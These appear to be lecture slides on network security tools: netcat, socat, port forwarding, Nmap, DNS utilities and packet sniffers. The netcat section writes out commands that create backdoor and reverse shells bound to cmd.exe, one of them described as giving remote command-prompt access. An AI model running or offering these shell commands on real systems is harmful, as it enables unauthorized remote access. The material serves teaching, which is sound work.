Cyber Security –

lecture 11
Contents
 Networks Vulnerability Scanning

 Understanding Port and Services tools

 TCP Handshake
 Connection establishment
 Connection termination

 Network Reconnaissance
 System Tools

 Brief about Domain Name Server(DNS)

 Network Sniffers and Injection tools

Need of Vulnerability Scanner
 Functions of vulnerability scanning are far different from firewall or intrusion detection
system.
 Vulnerability scanning tools helps in protecting an organization from any kind of security
risks or threats by scanning with deep inspection of endpoints to ensure that they are
configured securely and correctly.
 The prime aim of running a vulnerability scanner is identify the devices that are open for
vulnerabilities.
 There are different types of vulnerability scanners for eg: Port scanner, Network
vulnerability scanner, Host based vulnerability scanner, Web application security scanner,
Database security scanner etc..
Networks Vulnerability Scanning:
 A network vulnerability scanner is a software tool that scans an entire network and
its nodes for security vulnerabilities and loopholes.
 A network security scanner is primarily used by network administrators to evaluate
a network's security.
 A network security scanner scans all known and possible vulnerabilities and
threats.
 It scans all devices including Routers, Servers, Firewalls, Client computers etc..
 It checks for vulnerabilities such as: Password strength, Open ports, Scripts, Operating system
controls etc…
 After analysis scanners provide reports that includes information about IT assets, Associated
vulnerabilities, Prioritized threats, Percentage of risk vulnerability etc..
 Here we will discuss about two types of Network Vulnerability Scanner
 Netcat
 Socat
NetCat - nc
 netcat is a computer networking utility designed to read and write data across both TCP and
UDP network connections.
 It is a feature-rich network debugging and investigation tool since it can produce almost any
kind of connection its user could need.
 Modern Unix-based systems include Netcat as part of their default command set.
 Cygwin makes Netcat available on Windows systems also.
 Netcat works with several options. However, the following is a common Netcat syntax:

nc [options] [target system] [remote port]

Netcat Command Options
 -l
 This option tells the Netcat to be in listen mode.
 This binds Netcat to a local port to await incoming TCP connections, making it act as a server.
 -u
 This shifts Netcat from default TCP mode to UDP mode.
 This tells Netcat to bind to a UDP port instead of a TCP port.
 -e
 This tells what operation to perform after a successful connection.
 This option causes a listening Netcat to execute command any time someone makes a connection on
the port to which it is listening.
 -p
 Used to mention port.
 -z
 Tells netcat to send only enough data to discover which ports are open.
 -v
 Tells netcat to provide detailed reports, otherwise it reports only the data it receives.
Netcat Uses
 Netcat can be used for many purposes. It has a number of built-in capabilities.
 Data Transfer
 Perform basic Port Scanning
 Relays
 It can Create a backdoor
 Reverse Shells
 Obtain Remote Access to a Shell
 Perform port listening and redirection etc…………….
Netcat Uses
 Data Transfer
 Netcat can be used to transfer files between systems.
 Data transfer can be done in two ways. From a listener to client or client to listener.
 In this example a file is transferred from a listener to a client.
At listener: nc –l –p 6789 < test.txt
At Client: nc 127.0.0.1 6789 > test.txt
 Perform Basic Port Scanning
 It can perform simple port scans to easily identify open ports.
 This is done by specifying a range of ports to scan, along with the -z option to perform a scan
instead of attempting to initiate a connection.
 The basic command line for Netcat is nc [options] host ports.
 Here host represents the hostname or IP address to which the connection is to be done
 Ports represents either a single port or a port range in that particular host.
Example: nc -z -v domain.com 1-1000
or
nc -z -n -v 198.51.100.0 1-1000
Netcat Uses
 Relays
 Netcat can be configured to bounce an attack from machine to machine.
 Below diagram will make it clear how relays can be configured to practice.
Netcat Uses
 Create a backdoor
 Netcat’s most popular use by malicious users is to create a backdoor login shell.
 This simple script below will create a backdoor.
At listener: nc –l –p 1234 –e cmd.exe
At client: nc 127.0.0.1 1234
 Note that –e is being used to execute the action after the connection is being established.
 In Linux, these backdoors can be made persistent which means even after the current user logged
out, the backdoor will keep running in background.
 Reverse Shells
 Netcat can also be used to push a client session from the client to the server. This technique is
called a reverse shell and can be achieved with following commands
At listener: nc –l –p 1234
At client: nc 127.0.0.1 1234 –e cmd.exe
Netcat Uses
 Obtain Remote Access to a Shell
 To get command prompt of a Windows system from anywhere in the world, run the following
netcat command on that particular Windows system.
nc -l -e cmd.exe 10.0.1.2 4455
 The above Ncat example has opened a listener (-l) that will execute (-e) the cmd.exe command
and attach the command prompt input/output to any connection on port 4455.
 This can behave like a system backdoor on the Windows system.
Socat
 Socat is a network scanning tool similar to the Netcat.
 Netcat support only TCP and UDP protocol. But socat works over a number of
protocols compared to Netcat.
 In the format it takes two “addresses“. General syntax is shown below.
socat [options] address1 address2
 Here the connection opens on both sides, ie. transfers data between two addresses.
 It can handle multiple connections.
 It supports dozens of address types.
Understanding Port and Services tools
 For a packet to reach its destination, it must have an IP address and a port.
 TCP assigns 16-bit port numbers for connections. (ports 0 through 65535).
 Well-known ports ( port 0 to 1023):
 The Well Known Ports are controlled and assigned by the Internet Assigned Numbers Authority
(IANA).
 Well-known services like e-mail and the Web have predefined destination port numbers; e-mail uses
port 25 (SMTP), and the Web uses 80 (HTTP) and 443 (HTTPS).
 This doesn’t mean web services must always listen on port 80. Having default port gives clients a
better chance of discovering services and makes network administration easier.
 For example, network administrators can more easily create security rules and monitor expected
traffic if a service always uses a predictable port.
 Registered ports ( port 1024 to 49151 ):
 The port range of 1024 through 49151 is referred to as the group of registered ports.
 Dynamic ports ( port49151 to 65535 ):
 The range from 49152 through 65535 contains the dynamic, or ephemeral, ports
Port forwarding or redirecting tools
 A port redirection tool works by receiving data on one IP/port combination and
forwarding the data to another IP/port combination.
 It works as an intermediary between the original client and the destination.
 Port redirection is most useful for bypassing network access controls (eg: bypassing
firewalls) or crossing network boundaries.
 Fpipe, DataPipe and WinRelay are three free and simple tools designed to do simple
port-forwarding.
Port forwarding or redirecting tools
 Datapipe
 Datapipe is a Unix-based port redirection tool.
 Datapipe forwards traffic between TCP ports only.
 It passes TCP/IP traffic received by the tool on one port to another port to which the tool points.
 It function as a channel for TCP/IP connections, not an end point.
 Aside from holding IP addresses and port number, port redirection is protocol ignorant. It doesn't
care whether you pass encrypted SSH traffic or plain text.
 Datapipe does not perform protocol conversion or any other data manipulation.
Port forwarding or redirecting tools
 Datapipe: General syntax

$ ./datapipe localhost localport remotehost remoteport

 The localhost argument indicates the IP address on which to open the listening port.
 The localport argument indicates the listening port on the local system; connections will be
made to this port number.
 The remoteport argument indicates the port to which data is to be forwarded.
 The remotehost argument indicates the hostname or IP address of the target.

 The easiest conceptual example of port redirection is forwarding HTTP traffic.

 In this example connection coming to local port 9080, is redirected to reote port 80 of the
remote host(remote host-> www.google.com)
$ ./datapipe my.host 9080 80 www.google.com
Port forwarding or redirecting tools
 Fpipe
 It is provided by McAfee.
 It implements port redirection technique natively in windows.
 The fpipe adds more capability than datapipe.
 It also adds UDP support, which Datapipe lacks.
 Fpipe does not require any support DLLs (Dynamic-link library) or privileged user access.
 It runs on all Windows platforms.
 The lack of support DLLs makes it easy to pick up fpipe.exe and drop it onto a system.
 Example: C:\> fpipe -l 9080 -r 80 www.google.com
 -l The listening port number.
 -r The remote port number (the port to which traffic is redirected).
Port forwarding or redirecting tools
 WinRelay
 It is another windows based port redirection tool.
 It supports both TCP and UDP.
 It can works with both IPv4 and IPv6 address types.
 WinRelay and Fpipe share the same features.
 An antivirus reports the WinRelay as malicious because it consider this tools sole purpose to
be part of an exploit kit for compromising systems.
TCP : Connection establishment
 To establish a connection, TCP uses a three-way handshake.
 SYN: The connection request is performed by the client sending a SYN to the server.
 SYN-ACK: In response to SYN, the server replies with a SYN-ACK.
 ACK: Finally, the client sends an ACK back to the server.
TCP :Connection termination
 The connection termination phase uses a four-way handshake, with each side of the
connection terminating independently.
 When an endpoint wishes to stop its half of the connection, it transmits a FIN packet,
and the other end acknowledges with an ACK.
 To terminate the connection completely a pair of FIN and ACK segments should be
generated from both TCP endpoint as shown in figure.
 After the final ACK, it waits for a timeout before finally closing the connection.
Network Reconnaissance
 The process of acquiring information about a network or a preliminary survey to gain
information.
 Hackers use reconnaissance as the first step in an effective attack. Hackers find as much
information about the target as possible before launching the first attack.
 By conducting determined, methodical reconnaissance, attackers can determine how best
to mount their attacks successfully.
 Generally, goals of reconnaissance on a target network are to discover:
 Locate the network and identify IP addresses of hosts
 Find out accessible UDP and TCP ports.
 Identify open ports and underlying applications.
 Identify OS type in each hosts.
 Identify active machines.
 Network mapping.
 Nmap and THC- Amap are examples of tools designed to do Network Reconnaissance.
Nmap
 Network Mapper or Nmap is a free and open-source network scanner.
 Nmap started as a Linux utility and was ported to other systems including Windows, macOS
etc..
 Nmap is used to discover hosts and services on a computer network by sending packets and
analyzing the responses.
 General Syntax
$ nmap [Scan Type(s)] [Options] {target specification}
Nmap: Typical Features

 Identify Hosts on the Network

 Scan for TCP and UDP Ports
 Port scanning
 Scan for Protocols
 Identify a Target’s Operating System
 Scriptable interaction with the target
 Version detection
 Camouflage the Scan(hide scanning from security monitoring devices like firewall)
 Nmap can provide further information on targets, device types, and MAC addresses.
Nmap: Typical Features

 Identify Hosts on the Network

 To determine which hosts (i.e., IP addresses) on a network are live, use the Ping scanning
method. It sends ICMP echo requests to the specified range of IP addresses and awaits a
response. Based on the response, information about the network can be retrieved.
 Nmap applies the ICMP probing concepts to TCP ports as well.
 For example, by sending SYN, ACK packets to a TCP port nmap can assume whether a host is
live or not based on the response received.
 If it receives any response then Nmap assumes the host has responded and it is live.
 If it receives nothing, the host is assumed to not be live, not currently on the network, or
ignoring connections to the target port.
 Scan for TCP Ports
 The basic method of TCP port scanning is to call a TCP connect function for the port and
wait for a response.
 The connect function conduct the TCP three-way handshake and try to establish a
connection.
 The table given below represents the possible assumptions made by nmap after getting the
reply for various requests.
Nmap: Typical Features
Nmap: Typical Features
 Scan for UDP Ports
 Scanning for UDP services is more error-prone than scanning for TCP services because UDP does
not support the same state-handling of connection handshakes, resets, re requests, and so on.
 Scan for Protocols
 This is used to identify whether a port is supporting a particular type of protocol or not.
 For example if we make an attempt to connect to a UDP port the following conclusion can be
obtained.
 Nmap: Typical Features
 Camouflage the Scan:
 Nmap includes options that hide its scanning process from network security and monitoring
devices like firewall.
 Identify a Target’s Operating System
 One of Nmap’s most useful features is the capability to determine a host’s operating system
based on its responses to specific packets.
 The Nmap Scripting Engine (NSE)
 It is one of Nmap's most powerful and flexible features.
 It allows users to write their own codes to automate a wide variety of networking tasks.
 Code is written in lua programming language.
 These codes are then executed in parallel with the speed and efficiency you expect from
Nmap.
THC-Amap
 Like Nmap, Amap is a scanning tool that allows you to identify the applications that are
running on a specific port or ports.
 It is developed by The Hacker’s Choice (THC), hence the name THC-Amap.
 Scanning is done by sending trigger packets to the respective ports. These trigger packets
will typically be an application protocol handshake like TCP.
 Amap then looks up the response for the trigger in a list and prints out any match it finds.
 Amap supports many protocols like tcp and udp protocols, regular and SSL-enabled ASCII and
binary protocols.
 Amap has three modes of execution. A scan may use only one mode at a time.
Domain Name Servers: DNS
 As we know that every machine on a network has a IP address assigned to it, which is like a
unique address of that machine in our network.
 In similar way, every website on internet has a IP address associated to it but we normally
don’t use those IP addresses to access the website rather we use a name like google.com or
facebook.com.
 Just imagine how hard would it be to remember IP addresses of all these website, if these
names for not in use.
 So, how does these name translate into IP addresses, that’s because of DNS servers.
 Domain Name Servers (DNS) are the Internet's equivalent of a phone book.
 They maintain a directory of domain names and translate them to Internet Protocol (IP)
addresses.
 for example Domain Name :- www. www.turnonvpn.org.com
IP address :- 198.61.190.243
 Domain Name Servers: DNS
 When you type in a web address, e.g., www.turnonvpn.org, your Internet Service
Provider views the DNS associated with the domain name, translates it into a machine
friendly IP address and directs your Internet connection to the correct website.
Domain Name Servers: DNS
 Terminology used in DNS
 Domain name registrant: It is the organization or individual registering the domain name.
 Registrar: It is the company that takes your registration request and reserves your domain for you at
the main registry.
 Registry: During the domain name registration process, you will be asked to provide the registrar with
contact and technical information. The registrar will then submit the information to the central
directory, also known as the registry.
 Information from all the domain name servers across the Internet are gathered together and
housed at the Central Registry.
 Host companies and Internet Service Providers interact with the Central Registry on a regular
schedule to get updated DNS information.
System tools
 System tools that provide single-purpose functions related to network information for a host.
 Example:
 Whois
 Host
 Dig
 Nslookup
 Traceroute
System tools: Whois
 WHOIS ("who is") is a query and response protocol. It is basically a method used for checking
information about ownership of a domain name.
 It is widely used for querying databases.
 Databases stores information such as domain name, IP address and other details of the
registered users. (eg: Name, address, email, phone number etc…)
 Databases are collectively called the “whois” servers because they answer the question of who
is associated with an IP address or domain name.
 Whois servers are maintained by domain name authorities around the world and are available
for the public to see who owns the domain name and other information.
System tools: Whois
 An example result of whois utility is given here. By using the command
$ whois = facebook.com
the following response received from a database server. The result shows all the possible
information about the domain name.
Purpose of domain WHOIS?
 To determine whether a given domain name is available.
 To obtain the real world identity, business location and contact information of the user
(domain name registrant ) who uses the domain name.
 To contact network administrators for resolution of technical matters related to networks
associated with a domain name.
 To contact a domain name registrant on matters related to the protection and enforcement of
intellectual property rights. etc….
System tools: Traceroute
 Another descriptively named command is traceroute.
 It traces the route of an IP packet from its source to destination.
 The traceroute command starts by sending an IP packet (either ICMP or UDP) to the target,
but it sets the TTL (minimum Time To Live) field to 1.
 Each device that a packet passes through is supposed to decrement the TTL by one.
Consequently, the packet “expires” (stops being routed) at the first hop because the TTL
has reached 0.
 The routing device informs the sender that this has happened with an ICMP message.
 Similarly the next traceroute command sends another IP packet off to the destination, but
this time the TTL field is set to 2. The packet expires at the second hop, at which point that
routing device responds with an ICMP message.
 By continually incrementing the TTL until the packet reaches its destination, Traceroute can
discover which network devices exist between your host and the destination.
System tools: Traceroute
 The traceroute command helps diagnose certain kinds of routing problems.
 For example, it can identify the point of a network that prevents packets from reaching
their destination.
 The list of hops may also provide a hint at the geographical path and location of a target
based on hostnames.
System tools: host, dig, and nslookup
 Domain Name System-
 DNS is a service which translates IP address into domain name & vice-versa.
 Berkeley Internet Name Domain - BIND
 BIND is most widely used domain name server on the Internet.
 It is an Open source DNS software.
 BIND implements DNS protocols for internet, which provides us ability to implement IP to
domain name conversion & vice-versa .
 host, dig, and nslookup are the client utilities of DNS server ‘BIND’.
 These tools used to query DNS servers about what they know.
 These tools can also used to test out our DNS configuration.
 You do not need to install BIND to obtain these DNS client tools. By default they are
part of a Unix-based system’s core networking commands.
 System tools: nslookup
 nslookup
 The name "nslookup" means "name server lookup".
 nslookup is a network administration command-line tool.
 It is used for querying the Domain Name System (DNS) to obtain domain name or IP address
mapping, or other DNS records.
 nslookup operates in interactive or non-interactive mode.
 nslookup command used interactively to enter a shell from which you can change servers, set
query options, and debug DNS.
System tools: host
 host
 The host and nslookup tools perform the same function.
 host is a simple utility for performing DNS lookups.
 It is normally used to convert names to IP addresses and vice versa.
 you can use the host command to provide answers to simple host queries.
 When no arguments or options are given, host prints a short summary of its command line
arguments and options.
 Standard queries used
 To making host query using IP address
 To find out the domain name servers
 To display MX records
 To find out the domain TXT record
 To find out the SOA record.
System tools: dig
 dig
 Both dig and host were tools designed to address the scripting and simplicity-of-query issues of
nslookup.
 dig is another useful command line tool which you can use to gather information from DNS
servers.
 dig is a command line utility for probing the DNS.
 It produces multi-line output that you have to inspect as a whole but gives you a more detailed
answer than host.
 Most DNS administrators use dig to troubleshoot DNS problems because of its flexibility, ease of
use and clarity of output.
 Other lookup tools tend to have less functionality than dig.
Network Sniffers and Injection tools
 A network sniffer can listen and record any raw data that passes through it.
 Sniffers are useful tool for system and network administrators.
 The sniffer typically operates on the Data Link Layer of the OSI model so it does not have
to play by the rules of any higher level protocols.
 Sniffers are effective debugging tools and equally effective hacking tools.
 One way to limit the impact of sniffers is to employ encrypted channels for
communicating with services.
 Examples of sniffers
 Tcpdump
 Windump
 Wireshark
 Ettercap
 Hping
 Kismet
Tcpdump
 Tcpdump is a highly configurable, command-line packet sniffer for Unix.
 The tcpdump command is present by default on most Unix-based systems.
 It’s long been a part of the Unix due to its usefulness in debugging networks and services.
 Tcpdum was made strictly for
 network monitoring
 traffic analysis and testing
 packet inspection.
 It captures a lot of useful low level information about a packets passing on the network, and it
can help diagnose all kind of network problems.
 Tcpdump filters enable you to extract any combination of network packets.
 But it does not extract detailed information from higher-level protocols like HTTP, SNMP, or
DNS into more human-readable formats.
Windump
 WinDump is the tcpdump command’s counterpart for Windows systems.
 All functions offered by tcpdump are implemented in WinDump, so every operation that
can be done by tcpdump can be done in Windows as well, using WinDump.
 Windump command relies on the WinPcap driver for packet captures. So we need to
install both.
Wireshark
 A network packet analyzer will try to capture network packets and tries to display
that packet data as detailed as possible.
 Wireshark is a open source network packet analyzer.
 Some intended purposes:
 to troubleshoot network problems
 to examine security problems
 to verify network applications
 to debug protocol implementations
 to learn network protocol internals
Wireshark
 The following are some of the many features Wireshark provides:
 Available for UNIX and Windows.
 Capture live packet data from a network interface.
 Display packets with very detailed protocol information.
 Import files from many other capture programs.
 It can open files containing packet data captured with tcpdump /WinDump and many other
packet capture programs.

 Export files for many other capture programs.

 It can save captured packets in many formats, including those used by other capture
programs.

 Save packet data captured.

 Search for packets on many criteria.
 Filter packets on many criteria.
 Create various statistics.
Ettercap
 Ettercap is a free and open source network security tool for man-in-the-middle attacks
on LAN.
 It runs on Windows and various Unix-like operating system.
 In Ettercap method used is
 Configure a particular switch to port so that all traffic on the switch also gets sent to that “
switch monitoring” port.
 It can be used for computer network protocol analysis and security auditing.
 It is capable of intercepting traffic on a network segment, capturing passwords, and
conducting active eavesdropping against a number of common protocols.
Ping
 Ping is a networking utility used in an IP network.
 Ping is a basic Internet program that allows a user to verify that a particular IP address
exists or not and if exists whether it can accept requests.
 Ping works by sending an Internet Control Message Protocol (ICMP) Echo Request to a
specified interface on the network and waiting for a reply.
 Ping can be used for troubleshooting to test connectivity and determine response time.
Hping
 It is a one type of a tester for network security.
 This program allows user to do the same kind of testing as ping but using any IP
packet, including ICMP, UDP and TCP.
 By default hping uses TCP instead of ICMP.
 It constructs empty TCP packets and it sends those packets to port of the target.
 Hping usage
 Determine a host’s status when ping does not work.
 Testing firewall rules.
 Scan port without noticing
 To identify operating system
Kismet: Wireless monitoring tool
 Kismet is the most widely used and up to date open source wireless monitoring tool
licensed under the GNU GPL (General Public License).
 It is a network detector, passive packet sniffer, and intrusion detection system for 802.11
wireless LANs.
 It will work with any wireless card which supports RF monitoring mode.
 The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X.
 It can discover, log the IP range of any detected wireless network and report its signal and
noise levels.
Kismet: Wireless monitoring tool
 Basically there are three separate parts in Kismet Architecture.
 Drone
 Server
 Client
Kismet: Wireless monitoring tool
 Kismet Drone :
 The drone collects the information packets from the network which has to display.
 Kismet Server:
 Server accepts the information packets from the drone for interpretation.
 The server works in conjunction with drone or works on it’s own.
 It interprets the packet data and extrapolates the wireless information and organizes it.
 Kismet Client:
 The client communicates with the server and displays the information the server collects.